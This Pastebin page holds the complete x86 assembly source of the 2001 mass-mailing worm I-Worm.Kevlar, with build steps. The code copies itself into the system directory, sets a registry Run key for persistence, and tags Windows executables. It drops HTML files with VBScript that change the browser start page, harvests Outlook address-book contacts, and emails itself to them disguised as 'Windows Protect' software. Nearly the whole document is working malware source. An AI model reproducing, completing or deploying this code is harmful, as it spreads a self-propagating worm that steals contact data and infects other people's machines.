Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- comment #
- Name : I-Worm.Kevlar
- Author : PetiK
- Date : August 7th 2001 - August 16th 2001
- Size : 5120 byte
- Action : Copy itself to %System%\Kevlar32.exe hidden attribute
- %System%\MScfg32.exe normal attribute
- Add HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kevlar32 = %System%\Kevlar32.exe
- * Infect %Windir%\C???????.exe file on writing as "PetiK" in the file
- * Infect %Windir%\*.exe It add .htm and create a new file with ActiveX
- * Create C:\__.vbs This filetake all address in th e Address Book at save them in the
- %windir%\AddBook.txt. The worm scan this file to find the address and send a new mail :
- Subject : Windows Protect !!
- Body : The smallest software to stop your computer to bug in each time.
- I have found this program on WWW.KEVLAR-PROTECT.COM
- Take a look at the attchment.
- Bye and have a nice day.
- Attachment : MScfg32.exe
- * It creates the %windir%\MSinfo32.txt. I look like this :
- [File Infected] => Name of C???????.exe file infected
- CLEANMGR.EXE=Infected by W32.Kevlar.PetiK
- CVTAPLOG.EXE=Infected by W32.Kevlar.PetiK
- [EMail saved] => Some address found in the address book
- first@mail.com=Next victim
- second@mail.com=Next victim
- To build the worm:
- tasm32 /M /ML Kevlar
- tlink32 -Tpe -aa -x Kevlar,,,import32
- upx -9 Kevlar.exe
- To delete the worm:
- @echo off
- del %windir%\system\Kevlar32.exe
- del %windir%\system\MScfg32.exe
- del %windir%\*.exe.htm
- del %windir%\MSinfo32.txt
- del %windir%\AddBook.txt
- #
- .586p
- .model flat
- .code
- JUMPS
- callx macro a
- extrn a:proc
- call a
- endm
- include useful.inc
- DEBUT:
- F_NAME: push 50
- mov esi,offset Orig
- push esi
- push 0
- callx GetModuleFileNameA
- mov edi,offset CopyName2
- push edi
- push 50
- push edi
- callx GetSystemDirectoryA
- add edi,eax
- mov eax,'cSM\'
- stosd
- mov eax,'23gf'
- stosd
- mov eax,'exe.'
- stosd
- pop edi
- push 0
- push edi
- push esi
- callx CopyFileA
- mov edi,offset CopyName
- push edi
- push 50
- push edi
- callx GetSystemDirectoryA
- add edi,eax
- mov al,'\'
- stosb
- mov eax,'lveK'
- stosd
- mov eax,'23ra'
- stosd
- mov eax,'exe.'
- stosd
- pop edi
- push esi
- callx GetFileAttributesA
- cmp eax,1
- je SUITE
- push 0
- push edi
- push esi
- callx CopyFileA
- push 01h
- push edi
- callx SetFileAttributesA
- REG: pushad
- @pushsz "SHLWAPI.dll"
- callx LoadLibraryA
- test eax,eax
- jz FIN
- mov edi,eax
- @pushsz "SHSetValueA"
- push edi
- callx GetProcAddress
- test eax,eax
- jz FIN
- mov esi,eax
- push 08h
- push offset CopyName
- push 01h
- @pushsz "Kevlar32"
- @pushsz "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
- push 80000002h
- call esi
- push edi
- callx FreeLibrary
- popad
- call Nick
- mov edi,offset nickname
- push 40h
- @pushsz "Hello, my name is :"
- push edi
- push 0
- callx MessageBoxA
- call Infect
- jmp FIN
- SUITE: call Infect2
- VB_F: pushad
- push 00h
- push 80h
- push 02h
- push 00h
- push 01h
- push 40000000h
- @pushsz "C:\__.vbs"
- callx CreateFileA
- test eax,eax
- xchg edi,eax
- push 00h
- push offset octets
- push VBSSIZE
- push offset vbsd
- push edi
- callx WriteFile
- push edi
- callx CloseHandle
- popad
- push 1
- @pushsz "wscript C:\__.vbs"
- callx WinExec
- push 10000
- callx Sleep
- @pushsz "C:\__.vbs"
- callx DeleteFileA
- SCAN1: mov edi,offset addbook
- push edi
- push 50
- push edi
- callx GetWindowsDirectoryA
- add edi,eax
- mov eax,"ddA\"
- stosd
- mov eax,"kooB"
- stosd
- mov eax,"txt."
- stosd
- xor eax,eax
- stosd
- call OPEN
- FIN: push 00h
- callx ExitProcess
- Nick Proc
- mov edi,offset nickname
- callx GetTickCount
- push 9
- pop ecx
- xor edx,edx
- div ecx
- inc edx
- mov ecx,edx
- name_g:
- push ecx
- callx GetTickCount
- push 'Z'-'A'
- pop ecx
- xor edx,edx
- div ecx
- xchg eax,edx
- add al,'A'
- stosb
- callx GetTickCount
- push 100
- pop ecx
- xor edx,edx
- div ecx
- push edx
- callx Sleep
- pop ecx
- loop name_g
- ret
- Nick EndP
- Infect Proc
- pushad
- push 50
- push offset WinPath
- callx GetWindowsDirectoryA
- push offset WinPath
- callx SetCurrentDirectoryA
- FFF:
- push offset Search
- @pushsz "C???????.exe"
- callx FindFirstFileA
- inc eax
- je F_INF
- dec eax
- mov [exeHdl],eax
- I_FILE:
- mov verif,0
- xor eax,eax
- push eax
- push eax
- push 03h
- push eax
- push eax
- push 80000000h or 40000000h
- push offset Search.cFileName
- callx CreateFileA
- inc eax
- jz FNF
- dec eax
- xchg eax,ebx
- xor eax,eax
- push eax
- push eax
- push eax
- push 04h
- push eax
- push ebx
- callx CreateFileMappingA
- test eax,eax
- jz CL1
- xchg eax,ebp
- xor eax,eax
- push eax
- push eax
- push eax
- push 06h
- push ebp
- callx MapViewOfFile
- test eax,eax
- jz CL2
- xchg eax,edi
- mov esi,eax
- cmp word ptr [esi],"ZM"
- jne CL2
- cmp byte ptr [esi+18h],"@"
- jne CL2
- cmp word ptr [esi+80h],"EP"
- jne CL2
- cmp byte ptr [esi+12h],"P"
- je CL2
- mov word ptr [esi+12h],"eP"
- mov word ptr [esi+14h],"it"
- mov byte ptr [esi+16h],"K"
- inc verif
- push edi
- callx UnmapViewOfFile
- CL2:
- push ebp
- callx CloseHandle
- CL1:
- push ebx
- callx CloseHandle
- cmp verif,1
- jne FNF
- mov edi,offset InfoFile
- push edi
- push 50
- push edi
- callx GetWindowsDirectoryA
- add edi,eax
- mov eax,'iSM\'
- stosd
- mov eax,'3ofn'
- stosd
- mov eax,'xt.2'
- stosd
- mov al,'t'
- stosb
- pop edi
- mov esi,edi
- push esi
- @pushsz "Infected by W32.Kevlar.PetiK"
- push offset Search.cFileName
- @pushsz "File Infected"
- callx WritePrivateProfileStringA
- FNF:
- push offset Search
- push [exeHdl]
- callx FindNextFileA
- test eax,eax
- jne I_FILE
- FC:
- push [exeHdl]
- callx FindClose
- F_INF:
- popad
- ret
- Infect EndP
- Infect2 Proc
- pushad
- push 50
- push offset WinPath
- callx GetWindowsDirectoryA
- push offset WinPath
- callx SetCurrentDirectoryA
- FFF2:
- push offset Search
- @pushsz "*.exe"
- callx FindFirstFileA
- inc eax
- je F_INF2
- dec eax
- mov [exeHdl],eax
- I_FILE2:
- pushad
- mov edi,offset Search.cFileName
- push edi
- callx lstrlen
- add edi,eax
- mov eax,"mth."
- stosd
- xor eax,eax
- stosd
- push 00h
- push 80h
- push 02h
- push 00h
- push 01h
- push 40000000h
- push offset Search.cFileName
- callx CreateFileA
- test eax,eax
- xchg ebp,eax
- push 00h
- push offset octets
- push HTMSIZE
- push offset htmd
- push ebp
- callx WriteFile
- push ebp
- callx CloseHandle
- popad
- FNF2:
- push offset Search
- push [exeHdl]
- callx FindNextFileA
- test eax,eax
- jne I_FILE2
- FC2:
- push [exeHdl]
- callx FindClose
- F_INF2:
- popad
- ret
- Infect2 EndP
- OPEN: pushad
- push 00h
- push 80h
- push 03h
- push 00h
- push 01h
- push 80000000h
- push offset addbook
- callx CreateFileA
- inc eax
- je NO
- dec eax
- xchg eax,ebx
- xor eax,eax
- push eax
- push eax
- push eax
- push 02h
- push eax
- push ebx
- callx CreateFileMappingA
- test eax,eax
- je F1
- xchg eax,ebp
- xor eax,eax
- push eax
- push eax
- push eax
- push 04h
- push ebp
- callx MapViewOfFile
- test eax,eax
- je F2
- xchg eax,esi
- push 00h
- push ebx
- callx GetFileSize
- cmp eax,03h
- jbe F3 ; is the file empty ??
- call SCAN
- F3: push esi
- callx UnmapViewOfFile
- F2: push ebp
- callx CloseHandle
- F1: push ebx
- callx CloseHandle
- NO: popad
- ret
- SCAN:
- pushad
- xor edx,edx
- mov edi,offset m_addr
- push edi
- p_c: lodsb
- cmp al," "
- je car_s
- cmp al,0dh
- je entr1
- cmp al,0ah
- je entr2
- cmp al,"!"
- je f_mail
- cmp al,"@"
- je not_a
- inc edx
- not_a: stosb
- jmp p_c
- car_s: inc esi
- jmp p_c
- entr1: xor al,al
- stosb
- pop edi
- test edx,edx
- je SCAN
- call SEND_MAIL
- jmp SCAN
- entr2: xor al,al
- stosb
- pop edi
- jmp SCAN
- f_mail: popad
- ret
- SEND_MAIL:
- push 50
- push offset save_addr
- callx GetWindowsDirectoryA
- @pushsz "\MSinfo32.txt"
- push offset save_addr
- callx lstrcat
- push offset save_addr
- @pushsz "Next victim"
- push offset m_addr
- @pushsz "EMail saved"
- callx WritePrivateProfileStringA
- xor eax,eax
- push eax
- push eax
- push offset Message
- push eax
- push [MAPIHdl]
- callx MAPISendMail
- ret
- .data
- ; ===== INSTALLATION =====
- Orig db 50 dup (0)
- CopyName db 50 dup (0)
- CopyName2 db 50 dup (0)
- nickname db 11 dup (?)
- ; ===== INFECTION =====
- InfoFile db 50 dup (0)
- WinPath db 50 dup (0)
- exeHdl dd ?
- verif dd ?
- octets dd ?
- ; ===== MAIL =====
- addbook db 50 dup (0)
- save_addr db 50 dup (0)
- m_addr db 128 dup (?)
- MAPIHdl dd 0
- subject db "Windows Protect !!",00h
- body db "The smallest software to stop your computer to bug in each time.",0dh,0ah
- db "I have found this program on WWW.KEVLAR-PROTECT.COM",0dh,0ah,0dh,0ah
- db "Take a look at the attchment.",0dh,0ah,0dh,0ah
- db 09h,09h,"Bye and have a nice day.",00h
- NameFrom db "Your friend",00h
- Message dd ?
- dd offset subject
- dd offset body
- dd ?
- dd ?
- dd ?
- dd 2
- dd offset MsgFrom
- dd 1
- dd offset MsgTo
- dd 1
- dd offset Attach
- MsgFrom dd ?
- dd ?
- dd NameFrom
- dd ?
- dd ?
- dd ?
- MsgTo dd ?
- dd 1
- dd offset m_addr
- dd offset m_addr
- dd ?
- dd ?
- Attach dd ?
- dd ?
- dd ?
- dd offset CopyName2
- dd ?
- dd ?
- htmd:
- db '<html><head><title>PetiKVX come back</title></head><body>',0dh,0ah
- db '<script language=vbscript>',0dh,0ah
- db 'on error resume next',0dh,0ah
- db 'set fso=createobject("scripting.filesystemobject")',0dh,0ah
- db 'If err.number=429 then',0dh,0ah
- db 'document.write "<font face=''verdana'' size=''2'' color=''#FF0000''>'
- db 'You need ActiveX enabled to see this file<br><a href=''javascript:location.reload()''>'
- db 'Click Here</a> to reload and click Yes</font>"',0dh,0ah
- db 'Else',0dh,0ah
- db 'Set ws=CreateObject("WScript.Shell")',0dh,0ah
- db 'document.write "<font face=''verdana'' size=''3'' color=red>'
- db 'This page is generate by a worm<br>But this worm is proteced by Kevlar<br></font>"',0dh,0ah
- db 'document.write "<font face=''verdana'' size=''2'' color=blue><br>'
- db 'Worms are not dangerous for your computer but to survive, they must be strong</font>"',0dh,0ah
- db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.avp.ch"',0dh,0ah
- db 'End If',0dh,0ah
- db '</script></html>',00h
- HTMSIZE = $-htmd
- vbsd:
- db 'On Error Resume Next',0dh,0ah
- db 'Set Kevlar = CreateObject("Outlook.Application")',0dh,0ah
- db 'Set L = Kevlar.GetNameSpace("MAPI")',0dh,0ah
- db 'Set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah
- db 'Set c=f.CreateTextFile(f.GetSpecialFolder(0)&"\AddBook.txt")',0dh,0ah
- db 'c.Close',0dh,0ah
- db 'For Each M In L.AddressLists',0dh,0ah
- db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
- db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
- db 'Set P = M.AddressEntries(O)',0dh,0ah
- db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah
- db 'c.WriteLine P.Address',0dh,0ah
- db 'c.Close',0dh,0ah
- db 'Next',0dh,0ah
- db 'End If',0dh,0ah
- db 'Next',0dh,0ah
- db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah
- db 'c.WriteLine "!"',0dh,0ah
- db 'c.Close',0dh,0ah
- VBSSIZE = $-vbsd
- signature db "I-Worm.Kevlar coded by PetiK (c)2001",00h
- MAX_PATH equ 260
- FILETIME struct
- dwLowDateTime dd ?
- dwHighDateTime dd ?
- FILETIME ends
- WIN32_FIND_DATA struct
- dwFileAttributes dd ?
- ftCreationTime FILETIME ?
- ftLastAccessTime FILETIME ?
- ftLastWriteTime FILETIME ?
- nFileSizeHigh dd ?
- nFileSizeLow dd ?
- dwReserved0 dd ?
- dwReserved1 dd ?
- cFileName dd MAX_PATH (?)
- cAlternateFileName db 13 dup (?)
- db 3 dup (?)
- WIN32_FIND_DATA ends
- Search WIN32_FIND_DATA <>
- end DEBUT
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement